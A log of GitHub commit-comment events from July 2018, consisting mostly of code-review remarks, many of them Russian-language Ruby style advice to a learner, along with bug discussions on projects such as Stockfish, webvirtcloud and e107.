{"id":"7998872267","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29789141,"position":null,"line":null,"path":null,"commit_id":"127cf5111edd8dad0df306836692542bbbc0cbed","created_at":"2018-07-21T16:41:22Z","updated_at":"2018-07-21T16:41:22Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-245](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-245).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-245-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T16:41:22Z"}
{"id":"7998876638","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789144,"position":3,"line":3,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:44:57Z","updated_at":"2018-07-21T16:44:57Z","author_association":"NONE","body":"ключами в хеше, там где это возможно, лучше использовать символы\r\n- экономичней по памяти\r\n- легче набирать\r\n- проще читать\r\n- занимает меньше места в строке ))\r\n\r\nвместо\r\n```ruby\r\nhash = { 'abra' => 11, 'kadabra' => 33 }\r\n```\r\nлучше написать\r\n```ruby\r\nhash = { abra: 11, kadabra: 33 }\r\n```\r\n"}},"created_at":"2018-07-21T16:44:57Z"}
{"id":"7998877663","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789149,"position":3,"line":3,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:45:41Z","updated_at":"2018-07-21T16:45:41Z","author_association":"NONE","body":"в руби принято при написании хешей оставлять пробел после и перед фигурными скобками, вот так хорошо:\r\n```ruby\r\ngood_hash = { a: 1, b: 2 }\r\n```\r\nа вот так плохо:\r\n```ruby\r\nbad_hash = {a: 1, b: 2}\r\n```\r\n"}},"created_at":"2018-07-21T16:45:41Z"}
{"id":"7998877739","type":"CommitCommentEvent","actor":{"login":"ridouchire"},"repo":{"name":"MomozonoNanami/LandingPageTemplates"},"payload":{"comment":{"id":29789150,"position":1,"line":1,"path":"css/style.css","commit_id":"c64c21a29217a8f4ae7d38649375d8df44b7a675","created_at":"2018-07-21T16:45:45Z","updated_at":"2018-07-21T16:45:45Z","author_association":"NONE","body":"А почему свойства не разделены переносом строки? Нечитабельно же."}},"created_at":"2018-07-21T16:45:45Z"}
{"id":"7998878031","type":"CommitCommentEvent","actor":{"login":"LucasRoesler"},"repo":{"name":"openfaas/faas-cli"},"payload":{"comment":{"id":29789154,"position":36,"line":87,"path":"commands/deploy.go","commit_id":"1c6ef8226903d4375b41d02cbe4f32516bb0eaa9","created_at":"2018-07-21T16:45:58Z","updated_at":"2018-07-21T16:45:58Z","author_association":"MEMBER","body":"that works for me? I figured my first pass would be the long name, since it is clear without any documentation what it it doing, but the short name should be clear too"}},"created_at":"2018-07-21T16:45:58Z"}
{"id":"7998878486","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789155,"position":3,"line":3,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:46:18Z","updated_at":"2018-07-21T16:46:18Z","author_association":"NONE","body":"для лучшей читаемости длинные хеши часто пишут вот так:\r\n```ruby\r\nhash = {\r\n  a: 1,\r\n  b: 2,\r\n  c: 3,\r\n  d: 4,\r\n  e: 5\r\n}\r\n```\r\n\r\nили вот так:\r\n\r\n```ruby\r\nhash = {\r\n  a: 1, b: 2, c: 3,\r\n  d: 4, e: 5\r\n}\r\n```\r\n\r\nдаже вот так:\r\n\r\n```ruby\r\nhash = { a: 1, b: 2, c: 3,\r\n         d: 4, e: 5 }\r\n```\r\n\r\nхотя последний вариант наименее предпочитаемый\r\n"}},"created_at":"2018-07-21T16:46:18Z"}
{"id":"7998879706","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789156,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:47:12Z","updated_at":"2018-07-21T16:47:12Z","author_association":"NONE","body":"блоки, заключенные в фигурные скобки также, как хеши выделяются пробелами в начале и в конце:\r\n```ruby\r\ncollection.each { |element| do_smth(element) } # good\r\n\r\ncollection.each {|element| do_smth(element)} # bad\r\n```\r\n"}},"created_at":"2018-07-21T16:47:12Z"}
{"id":"7998881696","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29789158,"position":null,"line":null,"path":null,"commit_id":"1dabb861a726c89b392d0a25976ba6bfde4b1d20","created_at":"2018-07-21T16:48:41Z","updated_at":"2018-07-21T16:48:41Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-891](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-891).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-891-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T16:48:41Z"}
{"id":"7998881752","type":"CommitCommentEvent","actor":{"login":"gulios"},"repo":{"name":"hieplpvip/ASUS-ZENBOOK-UX410-HACKINTOSH"},"payload":{"comment":{"id":29789159,"position":null,"line":null,"path":null,"commit_id":"c2841ecaa39ee73495a6d8bb88aa0e9aaa2d0e74","created_at":"2018-07-21T16:48:44Z","updated_at":"2018-07-21T16:48:44Z","author_association":"NONE","body":"ok, created \r\nhttps://github.com/hieplpvip/ASUS-ZENBOOK-UX410-HACKINTOSH/issues/1\r\nI use\r\nVoodooI2C.kext\r\nVoodooI2CHID.kext\r\n\r\nThank you !"}},"created_at":"2018-07-21T16:48:44Z"}
{"id":"7998882176","type":"CommitCommentEvent","actor":{"login":"rohilthopu"},"repo":{"name":"nachoapps/rpad-cogs-utils"},"payload":{"comment":{"id":29789160,"position":null,"line":null,"path":null,"commit_id":"e32c30935e28f2c6e22b92a8a7c4b62061ea95aa","created_at":"2018-07-21T16:49:07Z","updated_at":"2018-07-21T16:49:07Z","author_association":"CONTRIBUTOR","body":"Okay so it looks like my attribute marked \"dungeon_comment\" is actually the \"dungeon_type\" that you were going for. I checked all the comments & types (original) and I caught all of the guerrillas and collabs, however, some of them I had labeled differently i.e. I had GachaDra/REMDra but you were expecting \"guerrilla\" or where I specificed \"multiplayer\" were actually just \"collab\" dungeons. I'll correct this soon and we could probably just use the dungeon_type rather than comment."}},"created_at":"2018-07-21T16:49:07Z"}
{"id":"7998882573","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789161,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:49:25Z","updated_at":"2018-07-21T16:49:25Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данные переменную лучше было бы назвать `|month, days|` (или другие имена, которые что-то говорят о переменной и ее функции в коде)\r\n\r\n"}},"created_at":"2018-07-21T16:49:25Z"}
{"id":"7998883224","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"LineageOS/android_device_oneplus_msm8998-common"},"payload":{"comment":{"id":29789162,"position":null,"line":null,"path":null,"commit_id":"19ee80da0f89771461a326637720a8adee5682a9","created_at":"2018-07-21T16:49:56Z","updated_at":"2018-07-21T16:49:56Z","author_association":"NONE","body":":1st_place_medal: "}},"created_at":"2018-07-21T16:49:56Z"}
{"id":"7998884465","type":"CommitCommentEvent","actor":{"login":"loetca"},"repo":{"name":"loetca/t"},"payload":{"comment":{"id":29789163,"position":4,"line":4,"path":"Hello.java","commit_id":"a757b42a626bb06175be829b94f71dd032d343a3","created_at":"2018-07-21T16:50:50Z","updated_at":"2018-07-21T16:50:50Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-21T16:50:50Z"}
{"id":"7998885524","type":"CommitCommentEvent","actor":{"login":"logcad"},"repo":{"name":"loetca/t"},"payload":{"comment":{"id":29789165,"position":4,"line":4,"path":"Hello.java","commit_id":"a757b42a626bb06175be829b94f71dd032d343a3","created_at":"2018-07-21T16:51:39Z","updated_at":"2018-07-21T16:51:39Z","author_association":"CONTRIBUTOR","body":"@loetca 8"}},"created_at":"2018-07-21T16:51:39Z"}
{"id":"7998888231","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789170,"position":3,"line":3,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:53:50Z","updated_at":"2018-07-21T16:53:50Z","author_association":"NONE","body":"работающее решение, но не оптимальное\r\nполучается, что программа пробегается по всем элементам от 10 до 100\r\nи для каждого элемента выполняется проверка\r\nтогда как нужен только каждый 5-ый элемент\r\n\r\nмного лишней работы\r\n\r\nа если бы прорвка требовала более сложных вычислений, чем  простое деление, а массив бы был на 10 миллионов элементов ?\r\n\r\nнужно поискать более экономичное решение\r\n"}},"created_at":"2018-07-21T16:53:50Z"}
{"id":"7998888912","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789171,"position":3,"line":3,"path":"Lesson2/l2_task2_fill_array.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:54:22Z","updated_at":"2018-07-21T16:54:22Z","author_association":"NONE","body":"рекомендацию по форматированию блоков оставил выше"}},"created_at":"2018-07-21T16:54:22Z"}
{"id":"7998890917","type":"CommitCommentEvent","actor":{"login":"LarsDu"},"repo":{"name":"bioconda/bioconda-recipes"},"payload":{"comment":{"id":29789172,"position":null,"line":null,"path":null,"commit_id":"1efc6ca510d427fe9b1335c3e21a4bcbc466968b","created_at":"2018-07-21T16:55:58Z","updated_at":"2018-07-21T16:55:58Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-21T16:55:58Z"}
{"id":"7998891136","type":"CommitCommentEvent","actor":{"login":"Bandic007"},"repo":{"name":"catborise/webvirtcloud"},"payload":{"comment":{"id":29789173,"position":null,"line":null,"path":null,"commit_id":"332de3709b5fbf39e777367435c6841b5c55c23a","created_at":"2018-07-21T16:56:08Z","updated_at":"2018-07-21T16:56:08Z","author_association":"NONE","body":"@catborise in your latest commit I still have the problem with the \"True\" in the **instances/tempalte/instance.html** line **1013**\r\n\r\nAlso - when I have a user, which is a staff one and \"can clone VMs\" and I hsare a template with him, when I try to clone the template from inside the user, I am getting this error:\r\n**Error: Instance mac '52:54:00:' invalid format!** \r\nI haven't change anything. I guess this issue (as I explained in another issue thread) is related to the \"guess\" mac function in the network card options. I am getting the same result when from the super admin user I use the guess option in the network settings and it gives me only '52:54:00:' mac every time.\r\nCould you please try to fix this? I will try to help you with what I can!"}},"created_at":"2018-07-21T16:56:08Z"}
{"id":"7998891280","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789174,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T16:56:15Z","updated_at":"2018-07-21T16:56:15Z","author_association":"NONE","body":"I have found a second, logical  bug (but this one generates no crashes).\r\nIn line 529 you set `ss->continuationHistory` where you use `rootPos.moved_piece(playMove)`.\r\nThe function moved_piece should be used **before** the move is executed on the board because it returns the piece on the **from square**. If this is used after the move done this is always empty (ok their are obscure castling cases in FRC where it could be not empty!) and the wrong history table is used."}},"created_at":"2018-07-21T16:56:15Z"}
{"id":"7998893026","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789176,"position":2,"line":2,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:57:39Z","updated_at":"2018-07-21T16:57:39Z","author_association":"NONE","body":"настоятельно не рекомендуется писать в одной строке несколько команд, разделяя их \"точкой с запятой\""}},"created_at":"2018-07-21T16:57:39Z"}
{"id":"7998893936","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789182,"position":2,"line":2,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T16:58:22Z","updated_at":"2018-07-21T16:58:22Z","author_association":"NONE","body":"вместо инициализации пустого массива и дальнейшего населения элементами, \r\nздесь было бы проще сразу инициализировать массив с элементами, к примеру вот так:\r\n```ruby\r\nfibbonacci = [0, 1, 1]\r\n```\r\n"}},"created_at":"2018-07-21T16:58:22Z"}
{"id":"7998894562","type":"CommitCommentEvent","actor":{"login":"taoliug"},"repo":{"name":"pulp-platform/ariane"},"payload":{"comment":{"id":29789187,"position":15,"line":290,"path":"src/csr_regfile.sv","commit_id":"cd1db48d14923924edde18e3b9f2efa2040e021f","created_at":"2018-07-21T16:58:53Z","updated_at":"2018-07-21T16:58:53Z","author_association":"NONE","body":"need to handle the tied off fields, like sd, uxl"}},"created_at":"2018-07-21T16:58:53Z"}
{"id":"7998894791","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29789188,"position":9,"line":196,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-21T16:59:02Z","updated_at":"2018-07-21T16:59:02Z","author_association":"CONTRIBUTOR","body":"I can't think of any way the `id=\"2\"` information can be used in a beneficial way, and I can think of some ways that would be harmful from what you said. Unless someone thinks of something (I asked in the PR), we'll probably remove it."}},"created_at":"2018-07-21T16:59:02Z"}
{"id":"7998897172","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789196,"position":7,"line":7,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:00:45Z","updated_at":"2018-07-21T17:00:45Z","author_association":"NONE","body":"чтобы взять последний и предпоследние элементы можно использовать индексы `- 1` и `- 2`, тогда не нужно считать индекс и хранить его в переменной\r\n\r\nвот так:\r\n```ruby\r\nelement = fibbonacci[-1] + fibbonacci[-2]\r\n```"}},"created_at":"2018-07-21T17:00:45Z"}
{"id":"7998897958","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789197,"position":7,"line":7,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:01:21Z","updated_at":"2018-07-21T17:01:21Z","author_association":"NONE","body":"это позволит избавиться от `i` и работы с этой переменной"}},"created_at":"2018-07-21T17:01:21Z"}
{"id":"7998898116","type":"CommitCommentEvent","actor":{"login":"krunalshahbeit2006"},"repo":{"name":"RaviParamasivan/rabobank-backend"},"payload":{"comment":{"id":29789198,"position":7,"line":41,"path":"src/main/java/com/rabobank/App.java","commit_id":"2b6d115827d2e9f495209127265d96a5964e7fdd","created_at":"2018-07-21T17:01:29Z","updated_at":"2018-07-21T17:01:29Z","author_association":"NONE","body":"args can be null, so it must be specific args that user can understand\r\n\r\nUse below command line argument option to get the value and also provide usage method so in any failure case user knows how to provide arguments\r\n\r\nCreate a enum for both argument options\r\ncustomer.statement.input.file.path, customer.statement.report.file.path\r\n\r\nprivate static final void usage() {\r\n\tLOGGER.warn(\"\\n\\nUsage:\\n\" +\r\n\t\t\t\"   <ClassName> \\n\" +\r\n\t\t\t\"       --customer.statement.input.file.path=<customer.statement.input.file.path> \\n\" +\r\n\t\t\t\"       --customer.statement.report.file.path=<customer.statement.report.file.path> \\n\" +\r\n\t\t\t\"   Example Arguments: --customer.statement.input.file.path=file:Customer_Statement_MT940_Monthly.csv|file:Customer_Statement_MT940_Monthly.xml --customer.statement.report.file.path=file:Customer_Statement_MT940_Report.csv \\n\");\r\n\tSystem.exit(1);\r\n}"}},"created_at":"2018-07-21T17:01:29Z"}
{"id":"7998899049","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29789200,"position":16,"line":27,"path":"src/io/jiyuujin/java/day17/Rectangle.java","commit_id":"69942c4cbcadea870fc87a5233c722bf0ffa12af","created_at":"2018-07-21T17:02:14Z","updated_at":"2018-07-21T17:02:14Z","author_association":"COLLABORATOR","body":"アノテーション…"}},"created_at":"2018-07-21T17:02:14Z"}
{"id":"7998899229","type":"CommitCommentEvent","actor":{"login":"PlaySnowi"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29789201,"position":null,"line":null,"path":null,"commit_id":"c4b43702554a8bf732eef6264c7053c370c6b201","created_at":"2018-07-21T17:02:21Z","updated_at":"2018-07-21T17:02:21Z","author_association":"NONE","body":"I'm having this problem:\r\nthe correct page loads for a second but then it is replaced by a page that says:\r\n\"Failed to compile\r\n./src/App.js\r\n Line 5:  'state' is not defined  no-undef\r\n\r\nSearch for the keywords to learn more about each error.\"\r\n\r\nEven without the linter, I have this error."}},"created_at":"2018-07-21T17:02:21Z"}
{"id":"7998899682","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789202,"position":7,"line":7,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:02:42Z","updated_at":"2018-07-21T17:02:42Z","author_association":"NONE","body":"лучше дать переменой более понятное название (`element`, `next`...)\r\nвообще однобуквенные переменные стоит использовать в очень редких случаях, когда их ипользование продиктовано контекстом решаемой задачи"}},"created_at":"2018-07-21T17:02:42Z"}
{"id":"7998900211","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29789203,"position":4,"line":28,"path":"src/io/jiyuujin/java/day19/GamePlayer.java","commit_id":"859a17bdeff4b51fb35c9a67db8b9f6d209159aa","created_at":"2018-07-21T17:03:06Z","updated_at":"2018-07-21T17:03:06Z","author_association":"COLLABORATOR","body":"アノテーション"}},"created_at":"2018-07-21T17:03:06Z"}
{"id":"7998902127","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789205,"position":6,"line":6,"path":"Lesson2/l2_task4_fill_hash_vowel.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:04:34Z","updated_at":"2018-07-21T17:04:34Z","author_association":"NONE","body":"пустой хеш принято задавать так:\r\n```ruby\r\nhash = {}\r\n```\r\n"}},"created_at":"2018-07-21T17:04:34Z"}
{"id":"7998902200","type":"CommitCommentEvent","actor":{"login":"drofp"},"repo":{"name":"SJSU-AD/FusionAD"},"payload":{"comment":{"id":29789206,"position":38,"line":38,"path":"src/modules/perception/lanes/lanes-v2.0/camera_node.py","commit_id":"5896bfced4dec3c297078acd1a86fd0c7f70e613","created_at":"2018-07-21T17:04:37Z","updated_at":"2018-07-21T17:04:37Z","author_association":"COLLABORATOR","body":"Should probably leave newline at end of file for consistency"}},"created_at":"2018-07-21T17:04:37Z"}
{"id":"7998904597","type":"CommitCommentEvent","actor":{"login":"sigmavirus24"},"repo":{"name":"heroku/django-heroku"},"payload":{"comment":{"id":29789208,"position":null,"line":null,"path":null,"commit_id":"1ed16ab6dff15ab4abe40ae9ae8216695d669c5e","created_at":"2018-07-21T17:06:33Z","updated_at":"2018-07-21T17:06:33Z","author_association":"CONTRIBUTOR","body":"No. Django 2 is Python 3 only so there’s no reason to support Python 2.7 if\nwe’re not supporting Django 2\n\nOn Sat, Jul 21, 2018 at 11:05 Hemanrt Meena <notifications@github.com>\nwrote:\n\n> Ok, thanks. Is there any tweak we can do for python2.7 ?\n>\n> —\n> You are receiving this because you commented.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/heroku/django-heroku/commit/1ed16ab6dff15ab4abe40ae9ae8216695d669c5e#commitcomment-29789059>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOsvr_SM6uoey74TbAZWxNLGbkB5O2iks5uI1FAgaJpZM4VZqzn>\n> .\n>\n-- \nIan Stapleton Cordasco\nSenior Software Engineer @ Heroku Connect\nSent from my phone. Please excuse my brevity\n"}},"created_at":"2018-07-21T17:06:33Z"}
{"id":"7998905656","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789210,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:07:25Z","updated_at":"2018-07-21T17:07:25Z","author_association":"NONE","body":"код нужно начинать с начала строки (если в этой строке не нужен отступ)\r\nв 5 строке, к примеру строка начинается с пробела - это не одобряется, профессионалы так не пишут"}},"created_at":"2018-07-21T17:07:25Z"}
{"id":"7998906091","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"2018STCapstonD/MIDI"},"payload":{"comment":{"id":29789212,"position":null,"line":null,"path":null,"commit_id":"dd26fba39d100a772b2ebaa62ff4cad39ce1f9c9","created_at":"2018-07-21T17:07:45Z","updated_at":"2018-07-21T17:07:45Z","author_association":"NONE","body":"#dd26fba"}},"created_at":"2018-07-21T17:07:45Z"}
{"id":"7998906728","type":"CommitCommentEvent","actor":{"login":"carolina46"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29789213,"position":null,"line":null,"path":null,"commit_id":"a5a6535273eb8a8131e886e6f643a05720abd45f","created_at":"2018-07-21T17:08:14Z","updated_at":"2018-07-21T17:08:14Z","author_association":"OWNER","body":"Te confundiste de método, modificaste el GET del formulario de las categorías.\r\nEl método para listar las categorías ya esta creado, esta a lo ultimo del CategoryController."}},"created_at":"2018-07-21T17:08:14Z"}
{"id":"7998907162","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789214,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T17:08:33Z","updated_at":"2018-07-21T17:08:33Z","author_association":"OWNER","body":"Hi @locutus2 , thank you for the help!\r\n\r\nI overlooked the `pseudo_legal` problem, this is a very good hint! Also the continuation history is important.\r\n\r\nAt the moment debug cannot work as I the only version which works reasonably calls search<NonPv> with -VALUE_INFINITE, VALUE_INFINITE bounds. I will have to fix lately, in the current version I removed the two assert which would be triggered to make this transparent.\r\n\r\nBy the way, you can of course `make` with `debug=yes` without changing Makefile, but I assume you already know this: `make build -j debug=yes ARCH=x86-64`"}},"created_at":"2018-07-21T17:08:33Z"}
{"id":"7998908027","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789218,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:09:14Z","updated_at":"2018-07-21T17:09:14Z","author_association":"NONE","body":"между словами нужно оставлять расстояние в один пробел\r\nв той же 5 строке перед \"путсом\" 2 пробела\r\nдалее по всему заданию нужно проверить, чтобы не было лишних пробелов"}},"created_at":"2018-07-21T17:09:14Z"}
{"id":"7998908944","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29789221,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T17:10:00Z","updated_at":"2018-07-21T17:10:00Z","author_association":"OWNER","body":"Here the test: http://tests.stockfishchess.org/tests/view/5b5368bd0ebc5902bdb81192"}},"created_at":"2018-07-21T17:10:00Z"}
{"id":"7998911582","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789224,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:12:05Z","updated_at":"2018-07-21T17:12:05Z","author_association":"NONE","body":"все эти замечания по стилю относятся ко всему коду, я далее постараюсь не дублировать, но нужно просмотреть остальные файлы на тему приведения их в порядок"}},"created_at":"2018-07-21T17:12:05Z"}
{"id":"7998912269","type":"CommitCommentEvent","actor":{"login":"stigok"},"repo":{"name":"hackeriet/space-status-button"},"payload":{"comment":{"id":29789225,"position":12,"line":22,"path":"buttond","commit_id":"ecef75bdeb270366402404ff0d026ea326f99c9c","created_at":"2018-07-21T17:12:35Z","updated_at":"2018-07-21T17:12:35Z","author_association":"COLLABORATOR","body":"`-eq` is for integers and `=` is for strings. Some times, I've had unexpected side effects"}},"created_at":"2018-07-21T17:12:35Z"}
{"id":"7998912635","type":"CommitCommentEvent","actor":{"login":"Deltik"},"repo":{"name":"e107inc/e107-test"},"payload":{"comment":{"id":29789226,"position":null,"line":null,"path":null,"commit_id":"249be2979c9a32d31f63e211fe232a6929de1b80","created_at":"2018-07-21T17:12:55Z","updated_at":"2018-07-21T17:12:55Z","author_association":"COLLABORATOR","body":"@CaMer0n: You were right about a caching problem.  e107inc/e107#3301 fixes 12 of the 13 failing tests by removing a pointless cache.\r\n\r\nThe remaining failed test, `pluginsTest::testForum()`, is fixed in cac7d2fade6dabcc601a788299c06d98ec4f2ab1.  In `e107/e107_plugins/forum/`, there is a file called `e_admin_events.php` that gets picked up by `pluginsTest::makePluginReport()` even though it's not a supported \"plugin addon\" in e107."}},"created_at":"2018-07-21T17:12:55Z"}
{"id":"7998914805","type":"CommitCommentEvent","actor":{"login":"krunalshahbeit2006"},"repo":{"name":"RaviParamasivan/rabobank-backend"},"payload":{"comment":{"id":29789230,"position":25,"line":24,"path":"src/main/java/com/rabobank/factory/FileType.java","commit_id":"25ae86dd3274d039a28fd2cc8a8a893afc6f86e3","created_at":"2018-07-21T17:14:32Z","updated_at":"2018-07-21T17:14:32Z","author_association":"NONE","body":"inputFilePath.toLowerCase() is required"}},"created_at":"2018-07-21T17:14:32Z"}
{"id":"7998915196","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789231,"position":5,"line":5,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T17:14:52Z","updated_at":"2018-07-21T17:14:52Z","author_association":"NONE","body":"кстати\r\nдля большинства редакторов существуют настройки при которых удаление \"trailing white-spaces\" (пробел в конце строки, пробел в пустой строке) происходит автоматически (например при сохранении файла)\r\nнужно найти такую настройку для вашего редактора"}},"created_at":"2018-07-21T17:14:52Z"}
{"id":"7998915519","type":"CommitCommentEvent","actor":{"login":"zarubaf"},"repo":{"name":"pulp-platform/ariane"},"payload":{"comment":{"id":29789233,"position":15,"line":290,"path":"src/csr_regfile.sv","commit_id":"cd1db48d14923924edde18e3b9f2efa2040e021f","created_at":"2018-07-21T17:15:07Z","updated_at":"2018-07-21T17:15:07Z","author_association":"MEMBER","body":"Should be handled in the latest commit:\r\n\r\nhttps://github.com/pulp-platform/ariane/blob/7433a1d85809c0e4060afd84369161f0a4ddf62b/src/csr_regfile.sv#L287-L294\r\n"}},"created_at":"2018-07-21T17:15:07Z"}
{"id":"7998917290","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29789238,"position":24,"line":194,"path":"src/fe_listbox.cpp","commit_id":"62c2a6e100194daf663c0ede39833172eb65eb1e","created_at":"2018-07-21T17:16:23Z","updated_at":"2018-07-21T17:16:23Z","author_association":"CONTRIBUTOR","body":"This 2 lines introduced a bug explained in the following issue\r\nhttps://github.com/mickelson/attract/issues/459\r\nIt can be commented as a quick fix"}},"created_at":"2018-07-21T17:16:23Z"}
